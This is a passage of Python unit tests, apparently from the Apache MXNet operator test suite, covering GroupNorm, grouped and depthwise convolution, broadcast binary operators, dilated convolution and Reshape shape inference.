data_sym = mx.sym.Variable("data")
gamma_sym = mx.sym.Variable("gamma")
beta_sym = mx.sym.Variable("beta")
for dtype in [np.float16, np.float32, np.float64]:
eps = 1e-2 if dtype == np.float16 else 1e-5
mx_data = mx.nd.array(np_data, dtype=dtype)
mx_gamma = mx.nd.array(np_gamma, dtype=dtype)
mx_beta = mx.nd.array(np_beta, dtype=dtype)
np_out, np_mean, np_std = np_groupnorm(np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
num_groups=num_groups,
eps=eps)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=True)
check_symbolic_forward(mx_sym, [mx_data, mx_gamma, mx_beta], [np_out, np_mean, np_std],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-3 if dtype == np.float16 else 1e-5, dtype=dtype)
mx_sym = mx.sym.GroupNorm(data=data_sym, gamma=gamma_sym, beta=beta_sym,
num_groups=num_groups, eps=eps, output_mean_var=False)
np_ograd = np.random.uniform(-1.0, 1.0, dshape).astype(dtype)
np_data_grad, np_gamma_grad, np_beta_grad = np_groupnorm_grad(np_ograd,
np_data.astype(dtype),
np_gamma.astype(dtype),
np_beta.astype(dtype),
np_mean, np_std,
num_groups, eps)
check_symbolic_backward(mx_sym, [mx_data, mx_gamma, mx_beta], [mx.nd.array(np_ograd)],
[np_data_grad, np_gamma_grad, np_beta_grad],
rtol=1e-2 if dtype == np.float16 else 1e-3,
atol=5e-2 if dtype == np.float16 else 1e-5, dtype=dtype)
@with_seed()
def test_convolution_grouping():
for dim in [1, 2, 3]:
num_filter = 4
for num_group in [1, 2]:
kernel = (3,) * dim
shape = (1, 4) + (9,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group, kernel=kernel)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel)
for i in range(num_group)])
exe1 = y1.simple_bind(default_context(), x=shape)
exe2 = y2.simple_bind(default_context(), x=shape, w=(num_filter, shape[1]//num_group) + kernel, b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.float32(np.random.normal(size=arr1.shape))
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/14052")
@with_seed()
def test_depthwise_convolution():
for dim in [1,2]:
for num_base in [1, 4, 16, 32, 64]:
for kernel_x in [3, 5]:
for stride_x in [1, 2]:
for pad_x in [0, 1]:
for in_size in [7, 32]:
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
num_group = num_base
shape = (2, num_base) + (in_size,) * dim
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b')
y1 = mx.sym.Convolution(data=x, weight=w, bias=b, num_filter=num_filter, num_group=num_group,
kernel=kernel, stride=stride, pad=pad)
xslice = mx.sym.SliceChannel(data=x, num_outputs=num_group, axis=1)
wslice = mx.sym.SliceChannel(data=w, num_outputs=num_group, axis=0)
bslice = mx.sym.SliceChannel(data=b, num_outputs=num_group, axis=0)
y2 = mx.sym.Concat(*[mx.sym.Convolution(data=xslice[i], weight=wslice[i], bias=bslice[i],
num_filter=num_filter//num_group, kernel=kernel,
stride=stride, pad=pad)
for i in range(num_group)])
dev = default_context()
exe1 = y1.simple_bind(dev, x=shape)
exe2 = y2.simple_bind(dev, x=shape, w=(num_filter, shape[1]//num_group)+kernel,
b=(num_filter,))
for arr1, arr2 in zip(exe1.arg_arrays, exe2.arg_arrays):
arr1[:] = np.random.normal(size=arr1.shape)
arr2[:] = arr1
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
exe2.forward(is_train=True)
exe2.backward(exe2.outputs[0])
for arr1, arr2 in zip(exe1.outputs + exe1.grad_arrays, exe2.outputs + exe2.grad_arrays):
np.testing.assert_allclose(arr1.asnumpy(), arr2.asnumpy(), rtol=1e-3, atol=1e-3)
@with_seed()
def test_convolution_independent_gradients():
# NOTE(zixuanweeei): Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/15603.
# GPU context will be enabled after figuring out the possible issue tracked at
# https://github.com/apache/incubator-mxnet/issues/15638.
ctx = mx.cpu()
atol = 1.0e-3
rtol = 1.0e-3
reqs = ["null", "write", "add"]
var_names = ["x", "w", "b"]
dims = [1, 2]
num_bases = [1, 16, 64]
kernel_xs = [3, 5]
stride_xs = [1, 2]
pad_xs = [0, 1]
in_sizes = [7, 32]
no_biases = [True, False]
for dim, num_base, kernel_x, stride_x, pad_x , in_size, no_bias in \
itertools.product(dims, num_bases, kernel_xs, stride_xs, pad_xs, in_sizes, no_biases):
# Prepare params shape
kernel = (kernel_x,) * dim
stride = (stride_x,) * dim
pad = (pad_x,) * dim
num_filter = num_base
x_shape = (2, num_base) + (in_size,) * dim
w_shape = (num_filter, num_base) + kernel
# Symbols definition
x = mx.sym.Variable('x')
w = mx.sym.Variable('w')
b = mx.sym.Variable('b') if not no_bias else None
conv = mx.sym.Convolution(x, w, b, num_filter=num_filter,
kernel=kernel, stride=stride, pad=pad, no_bias=no_bias)
for req_kind in reqs:
# Binding args for conv with possible dependent gradients
base_args = {
'x': mx.nd.random.normal(shape=x_shape, ctx=ctx),
'w': mx.nd.random.normal(shape=w_shape, ctx=ctx),
'b': mx.nd.random.normal(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
args1 = copy.deepcopy(base_args)
grad1 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req1 = [req_kind] * 3
grad_req1 = dict(zip(var_names, grad_req1))
exe1 = conv.bind(ctx, args1, args_grad=grad1, grad_req=grad_req1)
exe1.forward(is_train=True)
exe1.backward(exe1.outputs[0])
for x_req, w_req, b_req in itertools.product(reqs, repeat=3):
# Binding args for conv with independent gradients
args2 = copy.deepcopy(base_args) # Deepcopy the same params of `exe1`
grad2 = {
'x': mx.nd.zeros(shape=x_shape, ctx=ctx),
'w': mx.nd.zeros(shape=w_shape, ctx=ctx),
'b': mx.nd.zeros(shape=(num_filter, ), ctx=ctx) if not no_bias else None}
grad_req2 = {"x": x_req, "w": w_req, "b": b_req}
exe2 = conv.bind(ctx, args2, args_grad=grad2, grad_req=grad_req2)
exe2.forward(is_train=True)
np.testing.assert_allclose(exe1.outputs[0].asnumpy(),
exe2.outputs[0].asnumpy(), rtol=rtol, atol=atol)
exe2.backward(exe2.outputs[0])
for var_name in var_names:
if var_name == "b" and no_bias:
continue
if grad_req2[var_name] == "null":
exe2_var_grad = grad2[var_name].asnumpy()
np.testing.assert_allclose(exe2_var_grad,
np.zeros_like(exe2_var_grad), rtol=rtol, atol=atol)
if grad_req2[var_name] != grad_req1[var_name]:
continue
np.testing.assert_allclose(args1[var_name].asnumpy(),
args2[var_name].asnumpy(), rtol=rtol, atol=atol)
np.testing.assert_allclose(grad1[var_name].asnumpy(),
grad2[var_name].asnumpy(), rtol=rtol, atol=atol)
def gen_broadcast_data(idx):
# Manually set test cases
binary_op_data_shape = np.array(
[[[2, 5, 1, 30, 7], [1, 5, 448, 30, 1]],
[[10, 49, 1, 77, 17], [10, 1, 2, 1, 17]],
[[13, 2, 65, 2, 1], [13, 1, 65, 1, 225]],
[[9, 434, 4, 2, 37], [9, 1, 4, 1, 37]],
[[2, 52, 1, 4, 1], [1, 52, 60, 1, 37]],
[[1, 23, 7, 122, 50], [2, 1, 7, 1, 50]],
[[1, 17, 1, 5, 1], [22, 1, 2, 1, 28]],
[[29, 1, 2, 1, 8], [29, 22, 1, 130, 1]],
[[2, 36, 1, 427, 3], [1, 36, 11, 427, 1]],
[[1, 2, 1, 100, 7], [1, 2, 448, 100, 1]],
[[1, 2, 495, 77, 7], [1, 2, 1, 1, 7]],
[[1, 43, 65, 2, 1], [1, 43, 65, 1, 225]],
[[1, 92, 434, 2, 2], [1, 92, 1, 2, 2]],
[[1, 92, 1, 4, 1], [1, 92, 134, 1, 17]],
[[1, 53, 2, 122, 143], [1, 1, 2, 1, 143]],
[[1, 179, 1, 87, 17], [1, 179, 1, 1, 17]],
[[1, 1, 17, 5, 1], [1, 22, 1, 1, 28]],
[[1, 2, 1, 1, 8], [1, 2, 52, 430, 1]],
[[1, 163, 1, 22, 3], [1, 163, 116, 22, 1]],
[[1, 1, 44, 30, 7], [1, 1, 44, 30, 1]],
[[1, 1, 1, 1, 28], [1, 127, 1, 5, 28]],
[[1, 2, 394, 38, 1], [1, 2, 394, 38, 16]],
[[1, 10, 49, 77, 17], [1, 1, 1, 1, 17]],
[[1, 431, 6, 2, 225], [1, 1, 6, 2, 225]],
[[1, 15, 1, 28, 1], [1, 15, 1, 28, 463]],
[[1, 129, 2, 48, 96], [1, 129, 2, 1, 1]],
[[1, 1, 403, 17, 2], [1, 44, 403, 17, 2]],
[[1, 1, 65, 2, 22], [1, 1, 65, 1, 1]],
[[1, 24, 103, 17, 18], [1, 24, 1, 1, 1]],
[[1, 1, 1, 1, 2], [1, 24, 194, 50, 1]],
[[1, 1, 107, 84, 9], [1, 1, 1, 1, 1]]])
if idx < binary_op_data_shape.shape[0]:
l_shape = binary_op_data_shape[idx][0]
r_shape = binary_op_data_shape[idx][1]
else:
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
l_same_dim = np.random.randint(0, 5)
r_same_dim = np.random.randint(0, 5)
l_axis_flags = np.random.randint(0, 2, size=ndim)
r_axis_flags = np.random.randint(0, 2, size=ndim)
if l_same_dim == 4:
l_axis_flags = np.ones(ndim)
if r_same_dim == 4:
r_axis_flags = np.ones(ndim)
l_shape = shape.copy()
r_shape = shape.copy()
l_shape[np.where(l_axis_flags == 0)] = 1
r_shape[np.where(r_axis_flags == 0)] = 1
return [np.random.random(l_shape), np.random.random(r_shape)]
def gen_broadcast_data_int(idx):
d = gen_broadcast_data(idx);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def gen_binary_data(dummy):
ndim = np.random.randint(1, 6)
shape = np.random.randint(1, 6, size=(ndim,))
#print("gen shape {}".format(shape))
return [np.random.random(shape), np.random.random(shape)]
def gen_binary_data_int(dummy):
d = gen_binary_data(dummy);
return [np.round(d[0]*100).astype(int), np.round(d[1]*100).astype(int)]
def check_binary_op_forward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5, mx_nd_func=None):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])})
y.forward(is_train=True)
y = y.outputs[0].asnumpy()
x = baseline(d[0], d[1]).astype(y.dtype)
#np.set_printoptions(precision=20)
a = d[0]
b = d[1]
#print("a: {} {}".format(a.dtype, a))
#print("a: {} {}".format(b.dtype, b))
#print("x: {} {}".format(x.dtype, x))
#print("y: {} {}".format(y.dtype, y))
if mx_nd_func is not None:
d0 = mx.nd.array(d[0], dtype=d[0].dtype)
d1 = mx.nd.array(d[1], dtype=d[1].dtype)
assert_almost_equal(y, mx_nd_func(d0, d1).asnumpy(), rtol=rtol, atol=atol)
idx = np.abs(x-y) > atol+rtol*np.abs(x)
if idx.any():
import binascii
np.set_printoptions(precision=20)
logging.error('found precision problem:')
d[0] = np.broadcast_to(d[0], x.shape)
d[1] = np.broadcast_to(d[1], x.shape)
logging.error('input a: {}'.format(d[0][idx]))
logging.error('input b: {}'.format(d[1][idx]))
logging.error("output x: {} {}".format(x.dtype, x))
logging.error("output y: {} {}".format(y.dtype, y))
def ftohex(xs):
import struct
return list(map(lambda x: binascii.hexlify(struct.pack('d', x)), xs.flatten()))
logging.error('output x in baseline(a, b): {}'.format(x[idx]))
logging.error('output y in symbol(a, b): {}'.format(y[idx]))
logging.error('output x in baseline(a,b) hex: {}'.format(ftohex(x[idx])))
logging.error('output y in symbol(a,b) hex: {}'.format(ftohex(y[idx])))
logging.error('input a hex: {}'.format(ftohex(d[0][idx])))
logging.error('input a hex: {}'.format(ftohex(d[1][idx])))
logging.error('diff: {}'.format(np.abs(x-y)[idx] - atol-rtol*np.abs(x)[idx]))
assert_allclose(y, x, rtol=rtol, atol=atol)
def check_binary_op_backward(symbol, baseline, gen_data, rtol=1e-3, atol=1e-5):
sample_num = 200
for i in range(sample_num):
d = gen_data(i)
out = np.random.random((d[0] + d[1]).shape)
def reduce_op(shape, x):
if shape == x.shape:
return x
keepdims_shape = list(x.shape)
for i in range(len(shape)):
if x.shape[i] != shape[i]:
keepdims_shape[i] = 1
x = np.sum(x, axis=i).reshape(keepdims_shape)
return x
baseline_grad1, baseline_grad2 = baseline(out, d[0], d[1])
x_1 = reduce_op(d[0].shape, baseline_grad1)
x_2 = reduce_op(d[1].shape, baseline_grad2)
y_1 = mx.nd.empty(d[0].shape)
y_2 = mx.nd.empty(d[1].shape)
y = symbol.bind(default_context(), args={'a': mx.nd.array(d[0]), 'b': mx.nd.array(d[1])},
args_grad=[y_1, y_2])
y.forward(is_train=True)
y.backward([mx.nd.array(out)])
assert_allclose(y_1.asnumpy(), x_1, rtol=rtol, atol=atol)
assert_allclose(y_2.asnumpy(), x_2, rtol=rtol, atol=atol)
@with_seed()
def test_binary_op():
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = a + b
check_binary_op_forward(c, lambda a, b: a + b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_binary_data)
def test_bminus(a, b):
c = a - b
check_binary_op_forward(c, lambda a, b: a - b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_binary_data)
def test_bmul(a, b):
c = a * b
check_binary_op_forward(c, lambda a, b: a * b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_binary_data)
def test_bdiv(a, b):
c = a / b
check_binary_op_forward(c, lambda a, b: a / b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_binary_data)
def test_bmod(a, b):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
#c = a % b
c = mx.sym.cast(a, dtype='float64') % mx.sym.cast(b, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
check_binary_op_forward(c, lambda a, b: np.float32(a) % np.float32(b), gen_binary_data, rtol=0, atol=0)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.cast(a, dtype='int32') % mx.sym.cast(b, dtype='int32')
check_binary_op_forward(c, lambda a, b: a % b, gen_binary_data_int)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data_int)
def test_bpow(a, b):
c = a ** b
check_binary_op_forward(c, lambda a, b: a ** b, gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_binary_data)
def test_bneq(a, b):
c = a != b
# '!=' is sensitive to the precision of the comparison. Force numpy to match mxnet's float32.
# Issue exposed with seed 1644387363
check_binary_op_forward(c, lambda a, b: (np.float32(a) != np.float32(b)).astype(a.dtype), gen_binary_data)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_binary_data)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bneq(a, b)
@with_seed()
def test_broadcast_binary_op():
def check_bmaxmin_gradient(test_sym, x, y, delta, rtol, atol):
"""This function ensures that checking the numerical gradient of
broadcast_max/min is not crossing the boundary y=x where there
is no gradient definition at those sigularities."""
x_max = np.max(x)
y = x_max + 2 * delta + np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
x_min = np.min(x)
y = x_min - 2 * delta - np.random.random(y.shape)
check_numeric_gradient(test_sym, [x, y], numeric_eps=delta, rtol=rtol, atol=atol)
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
def test_bplus(a, b):
c = mx.sym.broadcast_plus(a, b)
check_binary_op_forward(c, lambda a, b: a + b, gen_broadcast_data, mx_nd_func=mx.nd.add)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, g_out), gen_broadcast_data)
def test_bminus(a, b):
c = mx.sym.broadcast_minus(a, b)
check_binary_op_forward(c, lambda a, b: a - b, gen_broadcast_data, mx_nd_func=mx.nd.subtract)
check_binary_op_backward(c, lambda g_out, a, b: (g_out, - g_out), gen_broadcast_data)
def test_bmul(a, b):
c = mx.sym.broadcast_mul(a, b)
check_binary_op_forward(c, lambda a, b: a * b, gen_broadcast_data, mx_nd_func=mx.nd.multiply)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * b, g_out * a), gen_broadcast_data)
def test_bdiv(a, b):
c = mx.sym.broadcast_div(a, b)
check_binary_op_forward(c, lambda a, b: a / b, gen_broadcast_data, mx_nd_func=mx.nd.divide)
check_binary_op_backward(c, lambda g_out, a, b: (g_out / b, - g_out * a / (b * b)), gen_broadcast_data)
def test_bmod(a_, b_):
# Python and numpy operate only in double so to avoid numerical errors we have to use
# doubles as well. This was a flaky test before when using float32. seed 1688524483, 1768433044
a = mx.sym.cast(a_, dtype='float64')
b = mx.sym.cast(b_, dtype='float64')
# '%' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
c = mx.sym.broadcast_mod(a, b)
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data, atol=1, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c,
lambda g_out, a, b: (g_out, - g_out * (np.float32(a) // np.float32(b))), gen_binary_data)
def test_bmod_int(a, b):
c = mx.sym.broadcast_mod(mx.sym.cast(a, dtype='int32'), mx.sym.cast(b, dtype='int32'))
check_binary_op_forward(c, lambda a, b: a % b, gen_broadcast_data_int, mx_nd_func=mx.nd.modulo)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bpow(a, b):
c = mx.sym.broadcast_power(a, b)
check_binary_op_forward(c, lambda a, b: a ** b, gen_broadcast_data, mx_nd_func=mx.nd.power)
check_binary_op_backward(c, lambda g_out, a, b: (g_out * a **(b - 1) * b,
g_out * a ** b * np.log(a)), gen_broadcast_data)
def test_bequal(a, b):
c = mx.sym.broadcast_equal(a, b)
check_binary_op_forward(c, lambda a, b: (a == b).astype(a.dtype), gen_broadcast_data_int,
mx_nd_func=mx.nd.equal)
check_binary_op_backward(c, lambda g_out, a, b: (np.zeros_like(a), np.zeros_like(b)), gen_broadcast_data_int)
def test_bmax(a, b):
c = mx.sym.broadcast_maximum(a, b)
check_binary_op_forward(c, lambda x, y: np.maximum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.maximum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bmin(a, b):
c = mx.sym.broadcast_minimum(a, b)
check_binary_op_forward(c, lambda x, y: np.minimum(x, y), gen_broadcast_data, mx_nd_func=mx.nd.minimum)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_band(a, b):
c = mx.sym.broadcast_logical_and(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_and(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_and)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bor(a, b):
c = mx.sym.broadcast_logical_or(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_or(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_or)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
def test_bxor(a, b):
c = mx.sym.broadcast_logical_xor(a, b)
check_binary_op_forward(c, lambda x, y: np.logical_xor(x, y), gen_broadcast_data, mx_nd_func=mx.nd.logical_xor)
# pass idx=200 to gen_broadcast_data so that generated ndarrays' sizes are not too big
data = gen_broadcast_data(idx=200)
check_bmaxmin_gradient(c, data[0], data[1], 0.001, 1e-2, 1e-3)
test_bplus(a, b)
test_bminus(a, b)
test_bmul(a, b)
test_bdiv(a, b)
test_bmod(a, b)
test_bmod_int(a, b)
test_bpow(a, b)
test_bequal(a, b)
test_bmax(a, b)
test_bmin(a, b)
test_band(a, b)
test_bor(a, b)
test_bxor(a, b)
@with_seed()
def test_run_convolution_dilated_impulse_response(dil=(1,1), kernel_shape=(3,3), verbose=False):
dim = len(dil)
assert(len(kernel_shape) == dim)
# Input for spike response
data_size = 33
data_shape = (1, 1) + (data_size,) * dim
center = (0,0) + (data_size // 2,) * dim
spike_imgs = np.zeros(shape=data_shape, dtype=np.float32)
spike_imgs[center] = 1.0
spike_img = mx.nd.array(spike_imgs)
spike_img2 = mx.nd.array(spike_imgs)
kernel_weights = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel_weights2 = mx.nd.ones(shape=tuple([1,1]+list(kernel_shape)), dtype=np.float32)
kernel = mx.symbol.Variable('kernel')
in_img = mx.symbol.Variable('input')
net = mx.symbol.Convolution(in_img, num_filter=1,kernel=kernel_shape, dilate=dil, no_bias="true", name='test_convolution')
net.list_arguments()
be = net.bind(default_context(), args={ 'input' : spike_img, 'test_convolution_weight' : kernel_weights},
args_grad={'input' : spike_img2, 'test_convolution_weight' : kernel_weights2 } )
be.forward(True)
out_o = be.outputs[0].asnumpy()
ndo = be.outputs[0]
out_grads = np.zeros(shape=be.outputs[0].shape, dtype=np.float32)
out_grads[center] = 1.0
out_grad = mx.nd.array(out_grads)
be.backward([out_grad])
vgrad = be.grad_arrays[0].asnumpy()
out = out_o.reshape(out_o.shape[2:])
nz_loc = np.nonzero(out)
assert_allclose(np.sum(out),np.prod(kernel_shape),atol=1e-5)
assert_allclose(np.sum(vgrad),np.prod(kernel_shape),atol=1e-5)
# Now check whether the input gradient was computed correctly
input_grad = mx.nd.array(vgrad)
be = net.bind(default_context(), args={ 'input' : input_grad, 'test_convolution_weight' : kernel_weights})
be.forward(True)
out_o = be.outputs[0].asnumpy()
assert_allclose(out_o[center],np.prod(kernel_shape),atol=1e-5)
rnd_kernel_s = np.random.uniform(low=0.0, high=1.0, size=tuple([1,1]+list(kernel_shape))).astype(np.float32)
impulse_error = mx.nd.array(out_o/np.sum(out_o)) # This should be 1.0 at [0,0,16,16]
rnd_kernel = mx.nd.array(rnd_kernel_s)
rnd_kernel2 = mx.nd.array(rnd_kernel_s)
white_in = mx.nd.ones(shape=data_shape)
white_in2 = mx.nd.ones(shape=data_shape)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : rnd_kernel},
args_grad={'input' : white_in2, 'test_convolution_weight' : rnd_kernel2 } )
be.forward(True)
be.backward([impulse_error])
out_orig = be.outputs[0].asnumpy()
kernel_gradient = be.grad_arrays[1].asnumpy()
dkernel = mx.nd.array(rnd_kernel_s + kernel_gradient)
be = net.bind(default_context(), args={ 'input' : white_in, 'test_convolution_weight' : dkernel})
be.forward(True)
out = be.outputs[0].asnumpy()
# Now do a simple check of the kernel gradient
assert(out[center] - np.sum(kernel_gradient) - out_orig[center] < 0.001)
@with_seed()
def test_convolution_dilated_impulse_response():
# 1D
for dil in [ (1,), (2,), (3,) ]:
for ks in [ (1,), (2,), (3,), (4,)]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
# 2D
for dil in [ (1,1), (2,2), (3,3) ]:
for ks in [ (3,3), (4,4), (2,3), (3,2), (1,1) ]:
test_run_convolution_dilated_impulse_response(dil=dil, kernel_shape=ks)
@with_seed()
def test_reshape():
def test_reshape_new(src_shape, shape_args, reverse, dst_shape):
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, shape=shape_args, reverse=reverse)
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=src_shape)
assert output_shape[0] == dst_shape, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
dat_npy = np.random.rand(*src_shape)
grad_npy = np.random.rand(*dst_shape)
exe = net.simple_bind(default_context(), data=src_shape)
exe.arg_dict['data'][:] = dat_npy
exe.forward(is_train=True)
assert np.square(exe.outputs[0].asnumpy() - dat_npy.reshape(dst_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
exe.backward(out_grads=mx.nd.array(grad_npy))
assert np.square(exe.grad_dict['data'].asnumpy() - grad_npy.reshape(src_shape)).mean() < 1E-7, \
'Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s'\
%(str(src_shape), str(shape_args), str(reverse), str(dst_shape))
for i in range(len(src_shape)):
holdout_src_shape = list(src_shape)
holdout_src_shape[i] = 0
holdout_src_shape = tuple(holdout_src_shape)
net = mx.sym.Variable('data')
net = mx.sym.elemwise_add(net.reshape(shape_args, reverse=reverse), mx.sym.ones(shape=dst_shape))
input_shape, output_shape, __ = net.infer_shape(data=holdout_src_shape)
assert output_shape[0] == dst_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
assert input_shape[0] == src_shape, \
'Holdout Src Shape = %s, Shape Arguments = %s, Reverse = %s, Dst Shape = %s, ' \
'Output Shape = %s' %(str(holdout_src_shape), str(shape_args), str(reverse),
str(dst_shape), str(output_shape[0]))
# Test new api (Using shape)
test_cases = [
[(2, 3, 5, 5), (0, -1), False, (2, 75)],
[(2, 3, 5, 5), (0, 0, -1), False, (2, 3, 25)],
[(5, 3, 4, 5), (0, -1, 0), False, (5, 15, 4)],
[(2, 3, 5, 4), (-1, 0, 0), False, (8, 3, 5)],
[(2, 3, 5, 5), (0, 0, 0, 0), False, (2, 3, 5, 5)],
[(2, 4, 5, 3), (-1, 2, 2, 1), False, (30, 2, 2, 1)],
[(2, 3, 5, 6), (-2,), False, (2, 3, 5, 6)],
[(2, 3, 5, 6), (6, 1, -2), False, (6, 1, 5, 6)],
[(2, 3, 5, 6), (-3, -3), False, (6, 30)],
[(2, 3, 5, 6), (-3, -1), False, (6, 30)],
[(64,), (-4, 16, 4), False, (16, 4)],
[(64,), (-4, 16, -1), False, (16, 4)],
[(64, 1, 2, 3), (-4, 16, -1, -2), False, (16, 4, 1, 2, 3)],
[(2, 3, 5, 5), (0, -1), True, (5, 30)],
[(2, 3, 5, 5), (0, 0, -1), True, (3, 5, 10)],
[(5, 3, 4, 5), (0, -1, 0), True, (3, 20, 5)],
[(2, 3, 5, 4), (-1, 0, 0), True, (6, 5, 4)],
[(2, 3, 4, 5), (3, -1, 0), True, (3, 8, 5)],
[(2, 3, 5, 5), (5, 3, 0, -1), True, (5, 3, 5, 2)],
[(2, 3, 5, 5), (0, 0, 0, 0), True, (2, 3, 5, 5)],
[(2, 3, 5, 6), (-2,), True, (2, 3, 5, 6)],
[(2, 3, 5, 6), (-2, 1, 30), True, (2, 3, 1, 30)],
[(2, 3, 5, 6), (-3, -3), True, (6, 30)],
[(64,), (16, 4, -4), True, (16, 4)],
[(64,), (16, -1, -4), True, (16, 4)],
[(1, 2, 3, 64), (-2, -1, 16, -4), True, (1, 2, 3, 4, 16)]]
for test_case in test_cases:
test_reshape_new(*test_case)
# Test old api
net = mx.sym.Variable("data")
net = mx.sym.Reshape(net, target_shape=(2, 0))
js = net.tojson()
net = mx.sym.load_json(js)
_, output_shape, __ = net.infer_shape(data=(2, 3, 5, 5))
assert(output_shape[0] == (2, 75))
# Test for Flatten
data = mx.sym.Variable("data")
net = mx.sym.Flatten(data)
exe = net.simple_bind(ctx=default_context(), data=(5, 4, 3, 7))
data_npy = np.random.normal(size=(5, 4, 3, 7))
out_grad_npy = np.random.normal(size=(5, 4 * 3 * 7))
outputs = exe.forward(is_train=True, data=data_npy)[0].asnumpy()
assert_allclose(outputs, data_npy.reshape((5, 4 * 3 * 7)))
exe.backward(out_grads=[mx.nd.array(out_grad_npy, ctx=default_context())])
